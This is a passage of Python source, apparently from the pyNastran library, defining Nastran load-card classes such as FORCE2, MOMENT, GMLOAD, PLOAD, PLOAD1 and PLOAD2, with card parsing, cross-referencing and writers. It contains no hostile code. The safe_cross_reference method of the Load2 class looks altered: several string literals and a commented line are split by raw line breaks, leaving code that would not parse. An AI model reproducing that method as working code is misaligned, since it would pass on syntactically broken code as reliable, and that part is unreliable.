model.Node(self.g2, msg=msg)\n self.g3_ref = model.Node(self.g3, msg=msg)\n\n xyz1 = self.g1_ref.get_position()\n xyz2 = self.g2_ref.get_position()\n xyz3 = self.g3_ref.get_position()\n v21 = xyz2 - xyz1\n\n try:\n v21 /= norm(v21)\n except FloatingPointError:\n msg = 'v1=v21=%s norm(v21)=%s\\n' % (v21, norm(v21))\n msg += 'g1.get_position()=%s\\n' % xyz1\n msg += 'g2.get_position()=%s' % xyz2\n raise FloatingPointError(msg)\n\n if self.g4 is None:\n xyz4 = None\n v2 = xyz3 - xyz1\n try:\n v2 /= norm(v2)\n except FloatingPointError:\n msg = 'v2=v31=%s norm(v31)=%s\\n' % (v2, norm(v2))\n msg += 'g3.get_position()=%s\\n' % xyz3\n msg += 'g1.get_position()=%s' % xyz1\n raise FloatingPointError(msg)\n xyz = cross(v21, v2)\n else:\n self.g4_ref = model.Node(self.g4, msg=msg)\n xyz4 = self.g4_ref.get_position()\n v2 = xyz4 - xyz3\n\n try:\n v2 /= norm(v2)\n except FloatingPointError:\n msg = 'v2=v43=%s norm(v43)=%s\\n' % (v2, norm(v2))\n msg += 'g3.get_position()=%s\\n' % xyz3\n msg += 'g4.get_position()=%s' % xyz4\n raise FloatingPointError(msg)\n xyz = cross(v21, v2)\n\n self.xyz = xyz\n\n msgi = 'xyz1=%s xyz2=%s xyz3=%s xyz4=%s\\nv21=%s v43 (or v31)=%s\\nxyz=%s' % (\n xyz1, xyz2, xyz3, xyz4, v21, v2, self.xyz)\n normalize(self, msgi)\n\n def safe_cross_reference(self, model, safe_coord, debug=True):\n \"\"\"\n .. 
todo:: cross reference and fix repr function\n \"\"\"\n msg = ', which is required by %s sid=%s' % (self.type, self.sid)\n is_failed = False\n try:\n self.node_ref = model.Node(self.node, msg=msg)\n except KeyError:\n is_failed = True\n model.log.warning('failed to cross-reference NODE=%i%s' % (self.node, msg))\n\n try:\n self.g1_ref = model.Node(self.g1, msg=msg)\n xyz1 = self.g1_ref.get_position()\n except KeyError:\n is_failed = True\n model.log.warning('failed to cross-reference G1=%i%s' % (self.g1, msg))\n\n try:\n self.g2_ref = model.Node(self.g2, msg=msg)\n xyz2 = self.g2_ref.get_position()\n except KeyError:\n is_failed = True\n model.log.warning('failed to cross-reference G2=%i%s' % (self.g2, msg))\n\n try:\n self.g3_ref = model.Node(self.g3, msg=msg)\n xyz3 = self.g3_ref.get_position()\n except KeyError:\n is_failed = True\n model.log.warning('failed to cross-reference G3=%i%s' % (self.g3, msg))\n\n if not is_failed:\n v21 = xyz2 - xyz1\n\n if self.g4 is not None:\n try:\n self.g4_ref = model.Node(self.g4, msg=msg)\n xyz4 = self.g4_ref.get_position()\n except KeyError:\n # warn on the failure (the original logged this in the success branch)\n is_failed = True\n model.log.warning('failed to cross-reference G4=%i%s' % (self.g4, msg))\n elif not is_failed:\n # no G4; fall back to the G1->G3 vector (v31 instead of v43)\n xyz3, xyz4 = xyz1, xyz3\n\n if not is_failed:\n v43 = xyz4 - xyz3\n v2 = v43\n try:\n v21 /= norm(v21)\n except FloatingPointError:\n msg = 'v21=%s norm(v21)=%s\n' % (v21, norm(v21))\n msg += 'g1.get_position()=%s\n' % xyz1\n msg += 'g2.get_position()=%s' % xyz2\n raise FloatingPointError(msg)\n\n try:\n v43 /= norm(v43)\n except FloatingPointError:\n msg = 'v43=%s norm(v43)=%s\n' % (v43, norm(v43))\n msg += 'g3.get_position()=%s\n' % xyz3\n msg += 'g4.get_position()=%s' % xyz4\n raise FloatingPointError(msg)\n self.xyz = cross(v21, v43)\n\n #msgi = 'xyz1=%s xyz2=%s xyz3=%s xyz4=%s\nv21=%s v43 (or v31)=%s\nxyz=%s' % (\n #xyz1, xyz2, xyz3, xyz4, v21, v2, self.xyz)\n normalize(self, msg)\n\n @property\n def scaled_vector(self):\n return self.xyz * self.mag\n\n def uncross_reference(self):\n self.node = self.node_id\n self.g1 = self.G1()\n self.g2 = self.G2()\n self.g3 = self.G3()\n self.g4 = self.G4()\n self.node_ref = None\n self.g1_ref = None\n self.g2_ref = None\n self.g3_ref = None\n self.g4_ref = None\n self.xyz = None\n\n def get_loads(self):\n return [self]\n\n @property\n def node_id(self):\n if self.node_ref is not None:\n return self.node_ref.nid\n return self.node\n\n def G1(self):\n if self.g1_ref is not None:\n return self.g1_ref.nid\n return self.g1\n\n def G2(self):\n if self.g2_ref is not None:\n return self.g2_ref.nid\n return self.g2\n\n def G3(self):\n if self.g3_ref is not None:\n return self.g3_ref.nid\n return self.g3\n\n def G4(self):\n if self.g4_ref is not None:\n return self.g4_ref.nid\n return self.g4\n\n @property\n def node_ids(self):\n return [self.node_id, self.G1(), self.G2(), self.G3(), self.G4()]\n\n def _node_ids(self, nodes=None):\n \"\"\"returns nodeIDs for repr functions\"\"\"\n if not nodes:\n nodes = self.nodes\n if isinstance(nodes[0], integer_types):\n return [node for node in nodes]\n else:\n return [node.nid for node in nodes]\n\n def raw_fields(self):\n (node, g1, g2, g3, g4) = self._node_ids([self.node, self.g1, self.g2, self.g3, self.g4])\n list_fields = [self.type, self.sid, node, self.mag, g1, g2, g3, g4]\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return 
self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n #def transform_load(self):\n #xyz = self.cid_ref.transform_node_to_global(self.xyz)\n #if self.mag > 0.:\n #return (True, self.node, self.mag * xyz) # load\n #return (False, self.node, xyz) # enforced displacement\n\n #def get_reduced_loads(self, resolve_load_card=False, filter_zero_scale_factors=False):\n #scale_factors = [1.]\n #loads = self.F()\n #return(scale_factors, loads)\n\n\nclass FORCE2(Load2):\n \"\"\"\n Defines a static concentrated force at a grid point by specification of a\n magnitude and four grid points that determine the direction.\n\n +--------+-----+---+---+----+----+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +========+=====+===+===+====+====+====+====+\n | FORCE2 | SID | G | F | G1 | G2 | G3 | G4 |\n +--------+-----+---+---+----+----+----+----+\n \"\"\"\n type = 'FORCE2'\n def __init__(self, sid, node, mag, g1, g2, g3, g4, comment=''):\n Load2.__init__(self, sid, node, mag, g1, g2, g3, g4, comment)\n\n\n\nclass MOMENT(Load0):\n \"\"\"\n Defines a static concentrated moment at a grid point by specifying a\n scale factor and a vector that determines the direction.\n\n +--------+-----+---+-----+-----+-----+-----+-----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +========+=====+===+=====+=====+=====+=====+=====+\n | MOMENT | SID | G | CID | M | N1 | N2 | N3 |\n +--------+-----+---+-----+-----+-----+-----+-----+\n | MOMENT | 2 | 5 | 6 | 2.9 | 0.0 | 1.0 | 0.0 |\n +--------+-----+---+-----+-----+-----+-----+-----+\n \"\"\"\n type = 'MOMENT'\n\n def __init__(self, sid, node, mag, xyz, cid=0, comment=''):\n \"\"\"\n Creates a MOMENT card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n xyz : (3, ) float ndarray\n the load direction in the cid frame\n cid : int; default=0\n the coordinate system for the load\n comment : str; default=''\n a comment for the card\n \"\"\"\n Load0.__init__(self, sid, node, mag, xyz, cid=cid, comment=comment)\n\n def uncross_reference(self):\n self.node = self.node_id\n self.cid = self.Cid()\n self.node_ref = None\n self.cid_ref = None\n\n @property\n def node_ids(self):\n \"\"\"all the nodes referenced by the load\"\"\"\n return [self.node_id]\n\n @property\n def node_id(self):\n if self.node_ref is None:\n return self.node\n return self.node_ref.nid\n\n def raw_fields(self):\n list_fields = ['MOMENT', self.sid, self.node_id, self.Cid(),\n self.mag] + list(self.xyz)\n return list_fields\n\n def repr_fields(self):\n cid = set_blank_if_default(self.Cid(), 0)\n list_fields = ['MOMENT', self.sid, self.node_id, cid,\n self.mag] + list(self.xyz)\n return list_fields\n\n def write_card(self, size=8, is_double=False):\n if size == 8:\n scid = set_string8_blank_if_default(self.Cid(), 0)\n msg = 'MOMENT %8i%8i%8s%8s%8s%8s%8s\\n' % (\n self.sid, self.node_id,\n scid, print_float_8(self.mag), print_float_8(self.xyz[0]),\n print_float_8(self.xyz[1]), print_float_8(self.xyz[2]))\n else:\n scid = set_string16_blank_if_default(self.Cid(), 0)\n if is_double:\n msg = ('MOMENT* %16i%16i%16s%s\\n'\n '* %16s%16s%16s\\n') % (\n self.sid, self.node_id,\n scid, print_scientific_double(self.mag),\n print_scientific_double(self.xyz[0]),\n print_scientific_double(self.xyz[1]),\n print_scientific_double(self.xyz[2]))\n else:\n msg = ('MOMENT* %16i%16i%16s%s\\n'\n '* %16s%16s%16s\\n') % (\n self.sid, self.node_id,\n scid, print_float_16(self.mag), print_float_16(self.xyz[0]),\n print_float_16(self.xyz[1]), 
print_float_16(self.xyz[2]))\n return self.comment + msg\n\n\nclass MOMENT1(Load1):\n \"\"\"\n Defines a static concentrated moment at a grid point by specifying a\n magnitude and two grid points that determine the direction.\n\n +---------+-----+----+-------+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 |\n +=========+=====+====+=======+====+====+\n | MOMENT1 | SID | G | M | G1 | G2 |\n +---------+-----+----+-------+----+----+\n | MOMENT1 | 6 | 13 | -2.93 | 16 | 13 |\n +---------+-----+----+-------+----+----+\n \"\"\"\n type = 'MOMENT1'\n\n def __init__(self, sid, node, mag, g1, g2, comment=''):\n \"\"\"\n Creates a MOMENT1 card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n n1 / n2 : int / int\n defines the load direction\n n = n2 - n1\n comment : str; default=''\n a comment for the card\n \"\"\"\n Load1.__init__(self, sid, node, mag, g1, g2, comment)\n #Moment.__init__(self)\n\n\nclass MOMENT2(Load2):\n \"\"\"\n Defines a static concentrated moment at a grid point by specification\n of a magnitude and four grid points that determine the direction.\n\n +---------+-----+---+---+----+----+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +=========+=====+===+===+====+====+====+====+\n | MOMENT2 | SID | G | M | G1 | G2 | G3 | G4 |\n +---------+-----+---+---+----+----+----+----+\n \"\"\"\n type = 'MOMENT2'\n def __init__(self, sid, node, mag, g1, g2, g3, g4, comment=''):\n Load2.__init__(self, sid, node, mag, g1, g2, g3, g4, comment)\n\n\nclass GMLOAD(Load):\n \"\"\"\n Defines a static concentrated force at a grid point by specification of a\n magnitude and two grid points that determine the direction.\n \"\"\"\n type = 'GMLOAD'\n\n def __init__(self, sid, normal, entity, entity_id, method,\n load_magnitudes, cid=0, comment=''):\n \"\"\"Creates a GMLOAD object\"\"\"\n Load.__init__(self)\n if comment:\n self.comment = comment\n self.sid = sid\n self.cid = cid\n self.normal = normal\n self.entity = entity\n self.entity_id = entity_id\n self.method = method\n self.load_magnitudes = load_magnitudes\n self.cid_ref = None\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a GMLOAD card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n normal = array([\n double_or_blank(card, 3, 'N1', 0.),\n double_or_blank(card, 4, 'N2', 0.),\n double_or_blank(card, 5, 'N3', 1.),\n ])\n entity = string(card, 6, 'entity')\n entity_id = integer(card, 7, 'entity_id')\n method = string(card, 8, 'method')\n\n load_magnitudes = []\n for i in range(9, len(card)):\n ifield = i - 8\n load_mag = integer_or_double(card, i, 'load_magnitude_%s' % ifield)\n load_magnitudes.append(load_mag)\n return GMLOAD(sid, normal, entity, entity_id, method,\n load_magnitudes, cid=cid, comment=comment)\n\n #def DEquation(self):\n #if isinstance(self.dequation, int):\n #return self.dequation\n #return self.dequation.equation_id\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by GMLOAD sid=%s' % self.sid\n self.cid_ref = model.Coord(self.Cid(), msg=msg)\n #self.node = model.Node(self.node, msg=msg)\n #self.g1 = model.Node(self.g1, msg=msg)\n #self.g2 = model.Node(self.g2, msg=msg)\n #self.xyz = 
self.g2.get_position() - self.g1.get_position()\n #normalize(self, msg)\n\n def safe_cross_reference(self, model, xref_errors):\n msg = ', which is required by GMLOAD sid=%s' % self.sid\n self.cid_ref = model.safe_coord(self.Cid(), self.sid, xref_errors, msg=msg)\n\n def uncross_reference(self):\n self.cid = self.Cid()\n self.cid_ref = None\n\n def Cid(self):\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n #def G1(self):\n #if isinstance(self.g1, (integer_types, float)):\n #return self.g1\n #return self.g1_ref.nid\n\n #def G2(self):\n #if isinstance(self.g2, (integer_types, float)):\n #return self.g2\n #return self.g2_ref.nid\n\n #def NodeID(self):\n #if isinstance(self.node, integer_types):\n #return self.node\n #return self.node_ref.nid\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = ['GMLOAD', self.sid, self.Cid()] + list(self.normal) + [\n self.entity, self.entity_id, self.method] + self.load_magnitudes\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n # type: (int, bool) -> str\n \"\"\"\n The writer method used by BDF.write_card()\n\n Parameters\n -----------\n size : int; default=8\n the size of the card (8/16)\n \"\"\"\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\nclass PLOAD(Load):\n \"\"\"\n Static Pressure Load\n\n Defines a uniform static pressure load on a triangular or quadrilateral surface\n comprised of surface elements and/or the faces of solid elements.\n\n +-------+-----+------+----+----+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 |\n +=======+=====+======+====+====+====+====+\n | PLOAD | SID | P | G1 | G2 | G3 | G4 |\n +-------+-----+------+----+----+----+----+\n | PLOAD | 1 | -4.0 | 16 | 32 | 11 | |\n +-------+-----+------+----+----+----+----+\n \"\"\"\n type = 'PLOAD'\n\n def __init__(self, sid, pressure, nodes, comment=''):\n \"\"\"\n Creates a PLOAD card, which defines a uniform pressure load on a\n shell/solid face or arbitrarily defined quad/tri face.\n\n Parameters\n ----------\n sid : int\n load id\n pressure : float\n the pressure to apply\n nodes : List[int]\n The nodes that are used to define the normal are defined\n using the same method as the CTRIA3/CQUAD4 normal.\n n = 3 or 4\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n self.sid = sid\n self.pressure = pressure\n self.nodes = nodes\n assert len(self.nodes) in [3, 4], 'nodes=%s' % self.nodes\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a PLOAD card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n pressure = double(card, 2, 'pressure')\n nodes = [integer(card, 3, 'n1'),\n integer(card, 4, 'n2'),\n integer(card, 5, 'n3')]\n n4 = integer_or_blank(card, 6, 'n4', 0)\n if n4:\n nodes.append(n4)\n assert len(card) <= 7, 'len(PLOAD card) = %i\\ncard=%s' % (len(card), card)\n return PLOAD(sid, pressure, nodes, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a PLOAD card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n pressure = 
data[1]\n nodes = data[2:]\n if nodes[-1] == 0:\n nodes = list(nodes)\n nodes.pop()\n return PLOAD(sid, pressure, nodes, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n pass\n\n def safe_cross_reference(self, model, safe_coord):\n return self.cross_reference(model)\n\n def uncross_reference(self):\n pass\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = ['PLOAD', self.sid, self.pressure] + self.node_ids\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n # type: (int, bool) -> str\n \"\"\"\n The writer method used by BDF.write_card()\n\n Parameters\n -----------\n size : int; default=8\n the size of the card (8/16)\n \"\"\"\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\nclass PLOAD1(Load):\n \"\"\"\n Applied Load on CBAR, CBEAM or CBEND Elements\n\n Defines concentrated, uniformly distributed, or linearly distributed\n applied loads to the CBAR or CBEAM elements at user-chosen points\n along the axis. For the CBEND element, only distributed loads over\n an entire length may be defined.\n\n +--------+-----+------+------+-------+-----+-------+-----+-------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n +========+=====+======+======+=======+=====+=======+=====+=======+\n | PLOAD1 | SID | EID | TYPE | SCALE | X1 | P1 | X2 | P2 |\n +--------+-----+------+------+-------+-----+-------+-----+-------+\n | PLOAD1 | 25 | 1065 | MY | FRPR | 0.2 | 2.5E3 | 0.8 | 3.5E3 |\n +--------+-----+------+------+-------+-----+-------+-----+-------+\n \"\"\"\n type = 'PLOAD1'\n valid_types = ['FX', 'FY', 'FZ', 'FXE', 'FYE', 'FZE',\n 'MX', 'MY', 'MZ', 'MXE', 'MYE', 'MZE']\n\n # LE: length-based; FR: fractional; PR:projected\n valid_scales = ['LE', 'FR', 'LEPR', 'FRPR']\n\n def __init__(self, sid, eid, load_type, scale, x1, p1, x2=None, p2=None, comment=''):\n \"\"\"\n Creates a PLOAD1 card, which may be applied to a CBAR/CBEAM\n\n Parameters\n ----------\n sid : int\n load id\n eid : int\n element to apply the load to\n load_type : str\n type of load that's applied\n valid_types = {FX, FY, FZ, FXE, FYE, FZE,\n MX, MY, MZ, MXE, MYE, MZE}\n scale : float\n local pressure scaling factor\n x1 / x2 : float / float\n the starting/end position for the load application\n the default for x2 is x1\n p1 / p2 : float / float\n the magnitude of the load at x1 and x2\n the default for p2 is p1\n comment : str; default=''\n a comment for the card\n\n Point Load : x1 == x2\n Distributed Load : x1 != x2\n \"\"\"\n if comment:\n self.comment = comment\n if x2 is None:\n x2 = x1\n if p2 is None:\n p2 = p1\n self.sid = sid\n self.eid = eid\n self.load_type = load_type\n self.scale = scale\n self.x1 = x1\n self.p1 = p1\n self.x2 = x2\n self.p2 = p2\n self.eid_ref = None\n\n @property\n def Type(self):\n return self.load_type\n\n @Type.setter\n def Type(self, load_type):\n self.load_type = load_type\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a PLOAD1 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n eid = integer(card, 2, 'eid')\n load_type = string(card, 3, 
'Type (\"%s\")' % '\", \"'.join(cls.valid_types))\n scale = string(card, 4, 'scale (\"%s\")' % '\", \"'.join(cls.valid_scales))\n x1 = double(card, 5, 'x1')\n p1 = double(card, 6, 'p1')\n x2 = double_or_blank(card, 7, 'x2', x1)\n p2 = double_or_blank(card, 8, 'p2', p1)\n assert len(card) <= 9, 'len(PLOAD1 card) = %i\\ncard=%s' % (len(card), card)\n return PLOAD1(sid, eid, load_type, scale, x1, p1, x2, p2, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a PLOAD1 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n eid = data[1]\n load_type = data[2]\n scale = data[3]\n x1 = data[4]\n p1 = data[5]\n x2 = data[6]\n p2 = data[7]\n load_type = cls.valid_types[load_type - 1]\n scale = cls.valid_scales[scale - 1]\n return PLOAD1(sid, eid, load_type, scale, x1, p1, x2, p2, comment=comment)\n\n def validate(self):\n if self.load_type not in self.valid_types:\n msg = '%s is an invalid type on the PLOAD1 card; valid_types=[%s]' % (\n self.load_type, ', '.join(self.valid_types).rstrip(', '))\n raise RuntimeError(msg)\n if self.scale not in self.valid_scales:\n msg = '%s is an invalid scale on the PLOAD1 card; valid_scales=[%s]' % (\n self.scale, ', '.join(self.valid_scales).rstrip(', '))\n raise RuntimeError(msg)\n\n assert 0.0 <= self.x1 <= self.x2, '0.0 <= x1 <= x2 -> x1=%s x2=%s' % (self.x1, self.x2)\n if self.scale in ['FR', 'FRPR']:\n assert self.x1 <= 1.0, 'x1=%r' % self.x1\n assert self.x2 <= 1.0, 'x2=%r' % self.x2\n if self.scale not in self.valid_scales:\n msg = '%s is an invalid scale on the PLOAD1 card; valid_scales=[%s]' % (\n self.scale, ', '.join(self.valid_scales))\n raise RuntimeError(msg)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by PLOAD1 sid=%s' % self.sid\n self.eid_ref = model.Element(self.eid, msg=msg)\n\n def safe_cross_reference(self, model, safe_coord):\n return self.cross_reference(model)\n\n def uncross_reference(self):\n self.eid = self.Eid()\n self.eid_ref = None\n\n def transform_load(self):\n p1 = self.eid_ref.ga_ref.get_position()\n p2 = self.eid_ref.gb_ref.get_position()\n\n g0 = self.eid_ref.g0_vector\n #if not isinstance(g0, ndarray):\n #g0 = g0.get_position()\n\n x = p2 - p1\n y = p1 - g0\n z = cross(x, y)\n A = [x, y, z]\n #g = self.GravityVector()\n return A\n #(g2, matrix) = self.cid.transformToGlobal(A)\n #return (g2)\n\n #def get_reduced_loads(self, resolve_load_card=False, filter_zero_scale_factors=False):\n #\"\"\"\n #Get all load objects in a simplified form, which means all\n #scale factors are already applied and only base objects\n #(no LOAD cards) will be returned.\n\n #.. 
todo:: lots more object types to support\n    #\"\"\"\n    #scale_factors = [1.0]\n    #loads = [self]\n    #return scale_factors, loads\n\n    def get_loads(self):\n        return [self]\n\n    def Eid(self):\n        if self.eid_ref is not None:\n            return self.eid_ref.eid\n        return self.eid\n\n    def raw_fields(self):\n        list_fields = ['PLOAD1', self.sid, self.Eid(), self.load_type, self.scale,\n                       self.x1, self.p1, self.x2, self.p2]\n        return list_fields\n\n    def repr_fields(self):\n        return self.raw_fields()\n\n    def write_card(self, size=8, is_double=False):\n        # type: (int, bool) -> str\n        \"\"\"\n        The writer method used by BDF.write_card()\n\n        Parameters\n        -----------\n        size : int; default=8\n            the size of the card (8/16)\n        \"\"\"\n        card = self.raw_fields()\n        if size == 8:\n            return self.comment + print_card_8(card)\n        if is_double:\n            return self.comment + print_card_double(card)\n        return self.comment + print_card_16(card)\n\n\nclass PLOAD2(Load):\n    \"\"\"\n    +--------+-----+------+------+------+------+------+------+------+\n    |   1    |  2  |  3   |  4   |  5   |  6   |  7   |  8   |  9   |\n    +========+=====+======+======+======+======+======+======+======+\n    | PLOAD2 | SID |  P   | EID1 | EID2 | EID3 | EID4 | EID5 | EID6 |\n    +--------+-----+------+------+------+------+------+------+------+\n    | PLOAD2 | 21  | -3.6 |  4   |  16  |  2   |      |      |      |\n    +--------+-----+------+------+------+------+------+------+------+\n    | PLOAD2 | SID |  P   | EID1 | THRU | EID2 |      |      |      |\n    +--------+-----+------+------+------+------+------+------+------+\n    \"\"\"\n    type = 'PLOAD2'\n\n    def __init__(self, sid, pressure, eids, comment=''):\n        \"\"\"\n        Creates a PLOAD2 card, which defines an applied load normal to the quad/tri face\n\n        Parameters\n        ----------\n        sid : int\n            load id\n        pressure : float\n            the pressure to apply to the elements\n        eids : List[int]\n            the elements to apply pressure to\n            n < 6 or a continuous monotonic list of elements (e.g., [1, 2, ..., 1000])\n        comment : str; default=''\n            a comment for the card\n        \"\"\"\n        if comment:\n            self.comment = comment\n        if isinstance(eids, integer_types):\n            eids = [eids]\n        self.sid = sid\n        self.pressure = pressure\n        self.eids = eids\n        self.eids_ref = None\n\n    @classmethod\n    def add_card(cls, card, comment=''):\n        \"\"\"\n        Adds a PLOAD2 card from ``BDF.add_card(...)``\n\n        Parameters\n        ----------\n        card : BDFCard()\n            a BDFCard object\n        comment : str; default=''\n            a comment for the card\n        \"\"\"\n        sid = integer(card, 1, 'sid')\n        pressure = double(card, 2, 'p')\n\n        if integer_string_or_blank(card, 4, 'THRU') == 'THRU':\n            e1 = integer(card, 3, 'Element1')\n            e2 = integer(card, 5, 'Element2')\n            eids = [i for i in range(e1, e2 + 1)]\n            assert len(card) == 6, 'len(PLOAD2 card) = %i\\ncard=%s' % (len(card), card)\n        else:\n            eids = fields(integer, card, 'eid', i=3, j=len(card))\n        return PLOAD2(sid, pressure, eids, comment=comment)\n\n    @classmethod\n    def add_op2_data(cls, data, comment=''):\n        \"\"\"\n        Adds a PLOAD2 card from the OP2\n\n        Parameters\n        ----------\n        data : List[varies]\n            a list of fields defined in OP2 format\n        comment : str; default=''\n            a comment for the card\n        \"\"\"\n        sid = data[0]\n        pressure = data[1]\n        eids = list(data[2:])\n        return PLOAD2(sid, pressure, eids, comment=comment)\n\n    def cross_reference(self, model):\n        \"\"\"\n        Cross links the card so referenced cards can be extracted directly\n\n        Parameters\n        ----------\n        model : BDF()\n            the BDF object\n        \"\"\"\n        msg = ', which is required by PLOAD2 sid=%s' % self.sid\n        self.eids_ref = model.Elements(self.eids, msg=msg)\n\n    def safe_cross_reference(self, model, safe_coord):\n        return 
self.cross_reference(model)\n\n    def uncross_reference(self):\n        self.eids = self.element_ids\n        self.eids_ref = None\n\n    @property\n    def element_ids(self):\n        if self.eids_ref is not None:\n            eids = [elem.eid for elem in self.eids_ref]\n        else:\n            eids = self.eids\n        return eids\n\n    def get_loads(self):\n        return [self]\n\n    def raw_fields(self):\n        list_fields = ['PLOAD2', self.sid, self.pressure]\n        eids = self.element_ids\n        if len(eids) == 1:\n            list_fields += eids\n        else:\n            eids.sort()\n            delta_eid = eids[-1] - eids[0] + 1\n            if delta_eid != len(eids):\n                msg = 'eids=%s len(eids)=%s delta_eid=%s must be continuous' % (\n                    eids, len(eids), delta_eid)\n                raise RuntimeError(msg)\n            #list_fields += eids\n            list_fields += [eids[0], 'THRU', eids[-1]]\n        return list_fields\n\n    def repr_fields(self):\n        return self.raw_fields()\n\n    def write_card(self, size=8, is_double=False):\n        # type: (int, bool) -> str\n        \"\"\"\n        The writer method used by BDF.write_card()\n\n        Parameters\n        -----------\n        size : int; default=8\n            the size of the card (8/16)\n        \"\"\"\n        card = self.raw_fields()\n        if size == 8:\n            return self.comment + print_card_8(card)\n        if is_double:\n            return self.comment + print_card_double(card)\n        return self.comment + print_card_16(card)\n\n#def PLOAD4_func(self, sid, eids, pressures,\n    #g1=None, g34=None, cid=0, nvector=None, surf_or_line='SURF',\n    #line_load_dir='NORM', comment=''):\n    #\"\"\"\n    #Creates a PLOAD4 card\n\n    #Solid Format\n    #============\n    #Defines a pressure load on a face of a CHEXA, CPENTA, or CTETRA element.\n\n    #+--------+-----+-----+----+----+------+------+------+-------+\n    #|   1    |  2  |  3  | 4  | 5  |  6   |  7   |  8   |   9   |\n    #+========+=====+=====+====+====+======+======+======+=======+\n    #| PLOAD4 | SID | EID | P1 | P2 |  P3  |  P4  |  G1  | G3/G4 |\n    #+--------+-----+-----+----+----+------+------+------+-------+\n    #|        | CID | N1  | N2 | N3 | SORL | LDIR |      |       |\n    #+--------+-----+-----+----+----+------+------+------+-------+\n\n    #Shell Format\n    #============\n    #Defines a pressure load on a face of a CTRIA3, CTRIA6, CTRIAR,\n    #CQUAD4, CQUAD8, or CQUADR element.\n    #+--------+-----+-----+----+----+------+------+------+-------+\n    #|   1    |  2  |  3  | 4  | 5  |  6   |  7   |  8   |   9   |\n    #+========+=====+=====+====+====+======+======+======+=======+\n    #| PLOAD4 | SID | EID | P1 | P2 |  P3  |  P4  | THRU | EID2  |\n    #+--------+-----+-----+----+----+------+------+------+-------+\n    #|        | CID | N1  | N2 | N3 | SORL | LDIR |      |       |\n    #+--------+-----+-----+----+----+------+------+------+-------+\n\n    #.. 
warning:: NX does not support SORL and LDIR, MSC does\n #\"\"\"\n #if g34 is None:\n #return PLOAD4Solid(\n #sid, eids, pressures,\n #g1=None, g34=None, cid=0, nvector=None, surf_or_line='SURF',\n #line_load_dir='NORM', comment='')\n #return PLOAD4Shell(\n #sid, eids, pressures, cid=0, nvector=None, surf_or_line='SURF',\n #line_load_dir='NORM', comment='')\n\n\n#class PLOAD4Shell(PLOAD4):\n #def __init__(self, sid, eids, pressures, g1=None, g34=None, cid=0,\n #nvector=None, surf_or_line='SURF',\n #line_load_dir='NORM', comment=''):\n #PLOAD4.__init__(self, sid, eids, pressures, g1=None, g34=None,\n #cid=0, nvector=None,\n #surf_or_line='SURF',\n #line_load_dir='NORM',\n #comment='')\n#class PLOAD4Shell(PLOAD4):\n #def __init__(self, sid, eids, pressures, g1=None, g34=None, cid=0,\n #nvector=None, surf_or_line='SURF',\n #line_load_dir='NORM', comment=''):\n #PLOAD4.__init__(self, sid, eids, pressures, g1=g1, g34=g34,\n #cid=cid, nvector=nvector,\n #surf_or_line=surf_or_line,\n #line_load_dir=line_load_dir,\n #comment=comment)\n\nclass PLOAD4(Load):\n \"\"\"\n Solid Format\n ============\n Defines a pressure load on a face of a CHEXA, CPENTA, or CTETRA element.\n\n +--------+-----+-----+----+----+------+------+------+-------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n 